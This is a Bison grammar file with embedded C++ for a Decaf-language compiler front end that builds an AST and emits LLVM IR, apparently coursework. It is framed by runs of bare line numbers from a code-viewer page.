103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"
#include "decafexpr.cc"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = false;

using namespace std;

// this global variable contains all the generated code
llvm::Module *TheModule;

typedef map<string, descriptor* > symbol_table;
typedef list<symbol_table > symbol_table_list;
symbol_table symtbl;
symbol_table_list symtblt;

// this is the method used to construct the LLVM intermediate code (IR)
llvm::LLVMContext TheContext;
llvm::LLVMContext &Context = TheContext;
llvm::IRBuilder<> Builder(TheContext);
// the calls to TheContext in the init above and in the
// following code ensures that we are incrementally generating
// instructions in the right order

// dummy main function
// WARNING: this is not how you should implement code generation
// for the main function!
// You should write the codegen for the main method as
// part of the codegen for method declarations (MethodDecl)
static llvm::Function *TheFunction = 0;
static bool get_return;

descriptor *get_symbolt(string name){
for(auto s:symtblt){
map<string, descriptor* >::iterator it;
for (it = s.begin(); it != s.end(); it++) {
string s = it->first;
if(name == s)
return it->second;
}
}
return NULL;
}

descriptor *get_symbol(string name){
map<string, descriptor* >::iterator it;
for (it = symtbl.begin(); it != symtbl.end(); it++) {
string s = it->first;
if(name == s)
return it->second;
}
return NULL;
}

int put_symbolt(string name, descriptor * des){
if(symtblt.front()[name] != NULL){
return 0;
}
else{
symtblt.front()[name] = des;
return 1;
}
}

int put_symbol(string name, descriptor * des){
if(symtbl[name] != NULL){
return 0;
}
else{
symtbl[name] = des;
return 1;
}
}

bool check_symbol(string name, llvmValue k){
map<string, descriptor* >::iterator it;
for (it = symtbl.begin(); it != symtbl.end(); it++) {
string s = it->first;
if(name == s && it->second->kind == k){
return true;
}
}
return false;
}

llvm::Value * decafBlock::Codegen() {
symbol_table s;
symtblt.push_front(s);
llvm::Value *val = NULL;
if (NULL != FieldDeclList) {
val = FieldDeclList->Codegen();
}
if (NULL != StateDeclList) {
val = StateDeclList->Codegen();
}
symtblt.pop_front();
return val;
}

llvm::Value * decafStmt::Codegen() {
if(this->kind == dass){
decafAssign* s = (decafAssign*)this;
return s->Codegen();
}
else if(this->kind == dcall){
decafFunCall* s = (decafFunCall*)this;
return s->Codegen();
}
else if(this->kind == dblo){
decafBlock* s = (decafBlock*)this;
return s->Codegen();
}
else if(this->kind == dret){
decafReturn* s = (decafReturn*)this;
return s->Codegen();
}
else{
return NULL;
}
}

llvm::Value * decafFunCall::Codegen() {
descriptor * des = get_symbol(this->get_name());
llvm::Function * llvm_func = des->func;
std::vector<llvm::Value *> putsargs;
std::vector<llvm::Type *> putstypes;

for (auto& arg : llvm_func->args()) {
llvm::Type* func_type = arg.getType();
putstypes.push_back(func_type);
}
int i = 0;
for(auto p:this->get_para()){
decafBinexp * exp = (decafBinexp *)p;
llvm::Value* vt = exp->Codegen();
llvm::Type* func_type = putstypes[i++];

vt = Builder.CreateZExt(vt, func_type, "zexttmp");
/*
if(exp->get_kind() != "VariableExpr"){
llvm::ConstantInt* constantInt = llvm::dyn_cast<llvm::ConstantInt>(vt);
if (constantInt) {
llvm::APInt apIntValue = constantInt->getValue();
int intValue = apIntValue.getZExtValue();
vt = llvm::ConstantInt::get(func_type, intValue);
}
}
*/

putsargs.push_back(vt);
}

llvm::Value *ret_value = Builder.CreateCall(llvm_func, putsargs);
return ret_value;
}

llvm::Value * decafAssign::Codegen() {
decafBinexp* exp = this->get_exp();
exp->Codegen();
descriptor * des = get_symbolt(this->get_var());
Builder.CreateStore(exp->des.value,des->alloc);
return des->value;
}

llvm::Value * decafReturn::Codegen() {
decafBinexp* exp = this->get_exp();
if(exp){
exp->Codegen();
Builder.CreateRet(exp->des.value);
get_return = 0;
return exp->des.value;
}
else{
Builder.CreateRetVoid();
get_return = 0;
return NULL;
}
}

llvm::Value *decafBinexp::Codegen() {
if(this->des.kind == valueK){
decafAllexp * exp = (decafAllexp *)this;
return exp->Codegen();
}
else if(this->des.kind == expuK){
llvm::Value *L = Exp1->Codegen();
if (L == 0) {
return 0;
}
switch (this->get_op(Option)) {
case nottmp:
this->des.value = Builder.CreateNot(L, "nottmp");
break;
case negtmp:
this->des.value = Builder.CreateNeg(L , "negtmp");
break;
}
return this->des.value;
}
else if(this->des.kind == expbK){
llvm::Value *L = Exp1->Codegen();
llvm::Value *R = Exp2->Codegen();
if (L == 0 || R == 0) {
return 0;
}

switch (this->get_op(Option)) {
case addtmp:
this->des.value = Builder.CreateAdd(L, R, "addtmp");
break;
case subtmp:
this->des.value = Builder.CreateSub(L, R, "subtmp");
break;
case multmp:
this->des.value = Builder.CreateMul(L, R, "multmp");
break;
case remtmp:
this->des.value = Builder.CreateSRem(L, R, "remtmp");
break;
case divtmp:
this->des.value = Builder.CreateSDiv(L, R, "divtmp");
break;
case ortmp:
this->des.value = Builder.CreateOr(L, R, "ortmp");
break;
case andtmp:
this->des.value = Builder.CreateAnd(L, R, "andtmp");
break;
case eqtmp:
this->des.value = Builder.CreateICmpEQ(L, R, "eqtmp");
break;
case netmp:
this->des.value = Builder.CreateICmpNE(L, R, "netmp");
break;
case slttmp:
this->des.value = Builder.CreateICmpSLT(L, R, "slttmp");
break;
case sgttmp:
this->des.value = Builder.CreateICmpSGT(L, R, "sgttmp");
break;
case sletmp:
this->des.value = Builder.CreateICmpSLE(L, R, "sletmp");
break;
case sgetmp:
this->des.value = Builder.CreateICmpSGE(L, R, "sgetmp");
break;
case shltmp:
this->des.value = Builder.CreateShl(L, R, "shltmp");
break;
case shrtmp:
this->des.value = Builder.CreateLShr(L, R, "shrtmp");
break;
default:
this->des.value = NULL;
break;
}
return this->des.value;
}
else if(this->des.kind == funcK){
decafFunCall * call = (decafFunCall *)this;
this->des.value = call->Codegen();
return this->des.value;
}
}

llvm::Value *decafAllexp::Codegen() {
if(this->get_kind() == "VariableExpr"){
descriptor * des = get_symbolt(this->get_name());
llvm::Value* load = Builder.CreateLoad(des->alloc,this->get_name());
this->des.value = load;
}
else if(this->get_kind() == "NumberExpr"){
string s = this->get_name().substr(0, 2);
llvm::Value* arg;
if(s == "0x"){
arg = llvm::ConstantInt::get(llvm::Type::getInt32Ty(Context), std::stoi(this->get_name(),NULL,16));
}
else{
arg = llvm::ConstantInt::get(llvm::Type::getInt32Ty(Context), std::stoi(this->get_name(),NULL,10));
}
this->des.value = arg;
}
else if(this->get_kind() == "BoolExpr"){
if(this->get_name() == "True"){
llvm::Type* boolType = llvm::Type::getInt1Ty(Context);
llvm::Constant* trueValue = llvm::ConstantInt::get(boolType, 1);
this->des.value = trueValue;
}else if(this->get_name() == "False"){
llvm::Type* boolType = llvm::Type::getInt1Ty(Context);
llvm::Constant* falseValue = llvm::ConstantInt::get(boolType, 0);
this->des.value = falseValue;
}
}
else if(this->get_kind() == "StringConstant"){
llvm::GlobalVariable *GS = Builder.CreateGlobalString(this->get_name() ,"globalstring");
llvm::Value *stringConst = Builder.CreateConstGEP2_32(GS->getValueType(), GS, 0, 0, "cast");
this->des.value = stringConst;
}
return this->des.value;
}

llvm::Value *decafVar::Codegen() {
descriptor * des = new descriptor();
if(put_symbolt(this->get_name(),des)){
this->Alloca = Builder.CreateAlloca(this->lType, 0, this->get_name());
des->alloc = this->Alloca;
des->kind = valueK;
}
return this->Alloca;
}

llvm::Value *decafEXFuncDef::Codegen() {
descriptor* des = get_symbol(this->get_name());
if(check_symbol( this->get_name(), funcK)){
return this->lfunc;
}
else{
return 0;
}
}

llvm::Value *decafFuncDef::Codegen() {
descriptor* des = get_symbol(this->get_name());
if(check_symbol( this->get_name(), funcK)){
symbol_table s;
symtblt.push_front(s);
get_return = true;
llvm::BasicBlock *BB = llvm::BasicBlock::Create(TheContext, "entry", this->lfunc);
Builder.SetInsertPoint(BB);

int i = 0;
for(auto p:this->get_para()->get_para()){
this->lfunc->getArg(i)->setName(p->get_name());

descriptor * des2 = new descriptor();
if(put_symbolt(p->get_name(),des2)){
des2->alloc = Builder.CreateAlloca(p->lType, 0, p->get_name());
des2->kind = valueK;
}
Builder.CreateStore(this->lfunc->getArg(i),des2->alloc);
i++;
}

decafBlock * B = this->get_block();
B->Codegen();

if(get_return){
if(this->lType->isVoidTy())
Builder.CreateRetVoid();
else
Builder.CreateRet(llvm::ConstantInt::get(TheContext, llvm::APInt(32, 0)));
}
symtblt.pop_front();
symtblt.clear();
}
return this->lfunc;
}

// we have to create a main function
llvm::Function *gen_main_def() {
// create the top-level definition for main
llvm::FunctionType *FT = llvm::FunctionType::get(llvm::IntegerType::get(TheContext, 32), false);
llvm::Function *TheFunction = llvm::Function::Create(FT, llvm::Function::ExternalLinkage, "main", TheModule);
if (TheFunction == 0) {
throw runtime_error("empty function block");
}
// Create a new basic block which contains a sequence of LLVM instructions
llvm::BasicBlock *BB = llvm::BasicBlock::Create(TheContext, "entry", TheFunction);
// All subsequent calls to IRBuilder will place instructions in this location
Builder.SetInsertPoint(BB);

descriptor* des = new descriptor();
des->func = TheFunction;
des->kind = funcK;
put_symbol("main",des);

return TheFunction;
}

%}

%define parse.error verbose

%union{
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE T_EXTERN T_FUNC T_SEMICOLON T_COMMA T_CONTINUE T_FALSE T_TRUE T_VAR T_FOR T_NULL T_RETURN T_WHITESPACE
%token T_AND T_ASSIGN T_DIV T_DOT T_EQ T_RIGHTSHIFT T_GEQ T_GT T_LEFTSHIFT T_LEQ T_LT T_MINUS T_MOD T_MULT T_NEQ T_NOT T_OR T_PLUS
%token T_VOID T_INTTYPE T_BOOLTYPE T_STRINGTYPE
%token T_LCB T_RCB T_LPAREN T_RPAREN T_LSB T_RSB
%token T_COMMENT
%token T_BREAK T_ELSE T_IF T_WHILE
%token <sval> T_ID T_INTCONSTANT T_CHARCONSTANT T_STRINGCONSTANT

%type <ast> state_if state_while lvalues state_for state_break state_continue state_return exp assign assigns assignss method_call lvalue statements statement extern_list para_list_use para_usen para_use para_list_def block blockt var_decls var_decl method_decls method_decl decafpackage var_declp var_declps extern_def extern_defn extern_typen extern_type func_typen func_type method_type type

%right T_ASSIGN
%left T_OR
%left T_AND
%left T_EQ T_NEQ T_LT T_GT T_GEQ T_LEQ
%left T_PLUS T_MINUS
%left T_MULT T_DIV T_MOD T_RIGHTSHIFT T_LEFTSHIFT
%right T_NOT
%right T_UMINUS
%right T_LPAREN
%left T_RPAREN
%nonassoc T_IF
%nonassoc T_ELSE

%%

start: program

program: extern_list decafpackage{
ProgramAST *prog = new ProgramAST((decafEXFuncDefList *)$1, (PackageAST *)$2);
prog->Codegen();
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}
;

extern_list: extern_defn {
$$ = $1;
}
| {
decafEXFuncDefList *slist = new decafEXFuncDefList();
$$ = slist;
}
;

extern_defn: extern_def extern_defn {
decafEXFuncDefList *slist = (decafEXFuncDefList *)$2;
slist->push_front((decafEXFuncDef *)$1);
$$ = slist;
}
| {
decafEXFuncDefList *slist = new decafEXFuncDefList();
$$ = slist;
}
;

extern_def: T_EXTERN T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type T_SEMICOLON {
decafEXFuncDef *func = new decafEXFuncDef();
decafPara* para = (decafPara*)$5;
decafType * type = (decafType *)$7;
func->put_name($3);
func->put_type(type);
func->put_para((decafPara*)para);
$$ = func;
delete $3;

descriptor* des = new descriptor();
if(put_symbol( func->get_name(), des)){
llvm::Type *returnTy = func->lType;
string Name = func->get_name();
llvm::SmallVector<llvm::Type *,0> functionArgs;

for(auto p:func->get_para()->get_para()){
functionArgs.push_back(p->lType);
}
func->lfunc = llvm::Function::Create(
llvm::FunctionType::get(returnTy, functionArgs, false),
llvm::Function::ExternalLinkage,
Name,
TheModule
);
des->func = func->lfunc;
des->kind = funcK;
}
}
;

para_list_use: para_usen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen {
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use {
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;

para_use: exp { $$ = $1;}
;

para_list_def: extern_typen {
$$ = $1;
}
| func_typen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

func_typen: func_type T_COMMA func_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| func_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

func_type: T_ID extern_type {
decafType* type = (decafType*)$2;
type->put_name(*$1);
$$ = type;
delete $1;
}
;

extern_typen: extern_type T_COMMA extern_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| extern_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

extern_type: T_STRINGTYPE {
decafType* type = new decafType("StringType");
type->Ty = stringTy;
$$ = type;

type->lType = getLLVMType(type->Ty,Context);
}
| type {
decafType* type = (decafType* )$1;
$$ = type;
}
;

method_type: T_VOID {
decafType* type = new decafType("VoidType");
type->Ty = voidTy;
$$ = type;

type->lType = getLLVMType(type->Ty,Context);
}
| type {
decafType* type = (decafType* )$1;
$$ = type;
}
;

type: T_INTTYPE {
decafType* type = new decafType("IntType");
type->Ty = intTy;
$$ = type;

type->lType = getLLVMType(type->Ty,Context);
}
| T_BOOLTYPE {
decafType* type = new decafType("BoolType");
type->Ty = boolTy;
$$ = type;

type->lType = getLLVMType(type->Ty,Context);
}
;

decafpackage: T_PACKAGE T_ID T_LCB var_declps method_decls T_RCB {
decafVarList *field = (decafVarList *)$4;
decafFuncDefList *method = (decafFuncDefList *)$5;
$$ = new PackageAST(*$2, field, method);
delete $2;
}
| T_PACKAGE T_ID T_LCB T_RCB {
$$ = new PackageAST(*$2, new decafVarList(), new decafFuncDefList());
delete $2;
}
;

var_declps: var_declp var_declps {
decafVarList *slist = (decafVarList *)$2;
slist->cat_front((decafVarList *)$1);
$$ = slist;
}
| {
decafVarList *slist = new decafVarList();
$$ = slist;
}
;

var_declp: T_VAR lvalues type T_SEMICOLON {
decafType * type = (decafType *)$3;
decafVarList * list = (decafVarList *)$2;
list->put_types(type);
list->put_kinds("Scalar");
$$ = list;
}
| T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
decafAllexp * exp = (decafAllexp *)$5;
var->put_kind("Scalar");
var->put_type(type);
var->put_exp(exp);
list->push_front(var);
$$ = list;
}
| T_VAR lvalue type T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
var->put_kind("Scalar");
var->put_type(type);
list->push_front(var);
$$ = list;
}
;

var_decls: var_decl var_decls {
decafVarList *slist = (decafVarList *)$2;
slist->cat_front((decafVarList *)$1);
$$ = slist;
}
| {
decafVarList *slist = new decafVarList();
$$ = slist;
}
;

var_decl: T_VAR lvalues type T_SEMICOLON {
decafType * type = (decafType *)$3;
decafVarList * list = (decafVarList *)$2;
list->put_types(type);
$$ = list;
}
| T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
decafAllexp * exp = (decafAllexp *)$5;
var->put_type(type);
var->put_exp(exp);
list->push_front(var);
$$ = list;
}
| T_VAR lvalue type T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
var->put_type(type);
list->push_front(var);
$$ = list;
}
;

lvalues: lvalue T_COMMA lvalues {
decafVar* var = (decafVar*)$1;
decafVarList * list = (decafVarList*)$3;
list->push_back(var);
$$ = list;
}
| lvalue {
decafVar* var = (decafVar*)$1;
decafVarList * list = new decafVarList();
list->push_back(var);
$$ = list;
}
;

lvalue: T_ID {
decafVar* var = new decafVar(*$1) ;
$$ = var;
delete $1;
}
| T_ID T_LSB exp T_RSB {
decafVar* var = new decafVar(*$1) ;
decafAllexp* arr = (decafAllexp *)$3;
var->put_arr(arr);
var->put_kind("Array("+arr->get_name()+")");
$$ = var;
delete $1;
}
;

CONSTANT : T_INTCONSTANT | T_CHARCONSTANT | T_STRINGCONSTANT { };

method_decls: method_decl method_decls{
decafFuncDefList *slist = (decafFuncDefList *)$2;
slist->push_front((decafFuncDef *)$1);
$$ = slist;
}
| {
decafFuncDefList *slist = new decafFuncDefList();
$$ = slist;
}
;

method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafBlock * block = (decafBlock*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type);
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;

descriptor* des = new descriptor();
if(put_symbol( func->get_name(), des)){
llvm::Type *returnTy = func->lType;
std::vector<llvm::Type *> functionArgs;
for(auto p:func->get_para()->get_para()){
functionArgs.push_back(p->lType);
}

func->lfunc = llvm::Function::Create(
llvm::FunctionType::get(returnTy, functionArgs ,false),
llvm::Function::ExternalLinkage,
func->get_name(),
TheModule);
if (func->lfunc == 0) {
throw runtime_error("empty function block");
}

des->func = func->lfunc;
des->kind = funcK;
}
}
;

blockt: T_LCB var_decls statements T_RCB {
decafVarList *field = (decafVarList *)$2;
decafStmts *state = (decafStmts *)$3;
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafVarList *field = new decafVarList();
decafStmts *state = new decafStmts();
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
;

block: T_LCB var_decls statements T_RCB {
decafVarList *field = (decafVarList *)$2;
decafStmts *state = (decafStmts *)$3;
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafVarList *field = new decafVarList();
decafStmts *state = new decafStmts();
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
;

statements: statement statements {
decafStmts *slist = (decafStmts *)$2;
slist->push_front((decafStmt *)$1);
$$ = slist;
}
| {
decafStmts *slist = new decafStmts();
$$ = slist;
}
;

statement: blockt { $$ = $1; }
| assign T_SEMICOLON { $$ = $1; }
| method_call T_SEMICOLON { $$ = $1; }
| state_return T_SEMICOLON { $$ = $1; }
| state_if { $$ = $1; }
| state_while { $$ = $1; }
| state_for { $$ = $1; }
| state_break T_SEMICOLON { $$ = $1; }
| state_continue T_SEMICOLON { $$ = $1; }
;

state_if: T_IF T_LPAREN exp T_RPAREN blockt T_ELSE blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafBlock *else_block = (decafBlock *)$7;
decafIF *ifs = new decafIF(exp,if_block,else_block);
$$ = ifs;
}
| T_IF T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafIF *ifs = new decafIF(exp,if_block,NULL);
$$ = ifs;
}
;

state_while: T_WHILE T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *block = (decafBlock *)$5;
decafWhile *whiles = new decafWhile(exp,block);
$$ = whiles;
}
;

state_for: T_FOR T_LPAREN assignss T_SEMICOLON exp T_SEMICOLON assignss T_RPAREN blockt{
decafAllexp *exp = (decafAllexp *)$5;
decafBlock *block = (decafBlock *)$9;
decafAssignList *aslist = (decafAssignList *)$3;
decafAssignList *aslist2 = (decafAssignList *)$7;
decafFor * fors = new decafFor(exp,block,aslist,aslist2);
$$ = fors;
}
;

state_break: T_BREAK {
decafOutput * data = new decafOutput("BreakStmt");
$$ = data;
}
;

state_continue: T_CONTINUE {
decafOutput * data = new decafOutput("ContinueStmt");
$$ = data;
}
;

state_return: T_RETURN T_LPAREN exp T_RPAREN {
decafBinexp *exp = (decafBinexp *)$3;
decafReturn *ret = new decafReturn(exp);
$$ = ret;
}
| T_RETURN T_LPAREN T_RPAREN {
decafReturn *ret = new decafReturn(NULL);
$$ = ret;
}
| T_RETURN {
decafReturn *ret = new decafReturn(NULL);
$$ = ret;
}
;

assignss : assigns {
$$ = $1;
}
| {
decafAssignList *aslist = new decafAssignList();
$$ = aslist;
}
;

assigns: assign T_COMMA assigns {
decafAssignList *aslist = (decafAssignList *)$3;
decafAssign *ass = (decafAssign *)$1;
aslist->push_front(ass);
$$ = aslist;
}
| assign {
decafAssignList *aslist = new decafAssignList();
decafAssign *ass = (decafAssign *)$1;
aslist->push_front(ass);
$$ = aslist;
}
;

assign: lvalue T_ASSIGN exp {
decafVar* var = (decafVar *)$1;
decafBinexp* exp = (decafBinexp *)$3;
decafAssign* ass = new decafAssign(var->get_name(),exp);
ass->kind = dass;
ass->put_arr(var->get_arr());
$$ = ass;
}
;

exp : T_NOT exp {
decafUnaryexp * exp = new decafUnaryexp("Not", (decafBinexp*)$2);
$$ = exp;
}
| T_MINUS exp %prec T_UMINUS {
decafUnaryexp * exp = new decafUnaryexp("UnaryMinus", (decafBinexp*)$2);
$$ = exp;
}
| exp T_PLUS exp {
decafBinexp * exp = new decafBinexp("Plus", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_MINUS exp {
decafBinexp * exp = new decafBinexp("Minus", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_MULT exp {
decafBinexp * exp = new decafBinexp("Mult", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_DIV exp {
decafBinexp * exp = new decafBinexp("Div", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_MOD exp {
decafBinexp * exp = new decafBinexp("Mod", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_LEFTSHIFT exp {
decafBinexp * exp = new decafBinexp("Leftshift", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_RIGHTSHIFT exp {
decafBinexp * exp = new decafBinexp("Rightshift", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_LEQ exp {
decafBinexp * exp = new decafBinexp("Leq", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_GEQ exp {
decafBinexp * exp = new decafBinexp("Geq", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_LT exp {
decafBinexp * exp = new decafBinexp("Lt", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_GT exp {
decafBinexp * exp = new decafBinexp("Gt", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_EQ exp {
decafBinexp * exp = new decafBinexp("Eq", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_NEQ exp {
decafBinexp * exp = new decafBinexp("Neq", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_AND exp {
decafBinexp * exp = new decafBinexp("And", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| exp T_OR exp {
decafBinexp * exp = new decafBinexp("Or", (decafBinexp*)$1, (decafBinexp*)$3);
$$ = exp;
}
| T_LPAREN exp T_RPAREN { $$ = $2; }
| T_ID {
decafAllexp * exp = new decafAllexp(*$1,"VariableExpr");
$$ = exp;
delete $1;
}
| T_ID T_LSB exp T_RSB {
decafAllexp * exp = (decafAllexp *)$3;
decafArrexp * arr = new decafArrexp(*$1,exp);
$$ = arr;
delete $1;
}
| T_INTCONSTANT {
decafAllexp * exp = new decafAllexp(*$1,"NumberExpr");
$$ = exp;
delete $1;
}
| T_CHARCONSTANT {
decafAllexp * exp = new decafAllexp(*$1,"NumberExpr");
$$ = exp;
}
| T_STRINGCONSTANT {
decafAllexp * exp = new decafAllexp(*$1,"StringConstant");
$$ = exp;
}
| T_TRUE {
decafAllexp * exp = new decafAllexp("True","BoolExpr");
$$ = exp;
}
| T_FALSE {
decafAllexp * exp = new decafAllexp("False","BoolExpr");
$$ = exp;
}
| method_call { $$ = $1; }
;

method_call: T_ID T_LPAREN para_list_use T_RPAREN {
decafFunCall *call = new decafFunCall();
decafStmtList* para = (decafStmtList*)$3;
call->put_name($1);
call->put_para(para->get_para());
$$ = call;
delete $1;
}
;

%%

int main() {
// initialize LLVM
// Make the module, which holds all the code.
TheModule = new llvm::Module("Test", Context);
// set up symbol table
// set up dummy main function
llvm::StringRef newFilename = "DecafExpr";
TheModule->setSourceFileName(newFilename);
// parse the input and create the abstract syntax tree
int retval = yyparse();
// remove symbol table
// Finish off the main function. (see the WARNING above)
// return 0 from main, which is EXIT_SUCCESS
// Validate the generated code, checking for consistency.
// Print out all of the generated code to stderr
TheModule->print(llvm::errs(), nullptr);
return(retval >= 1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
